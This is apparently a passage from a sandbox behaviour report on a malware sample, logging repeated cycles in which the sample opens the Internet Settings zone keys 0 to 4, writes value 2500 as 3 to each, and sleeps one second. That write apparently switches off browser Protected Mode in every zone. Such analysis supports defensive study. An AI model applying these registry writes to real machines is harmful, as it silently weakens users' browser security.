| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
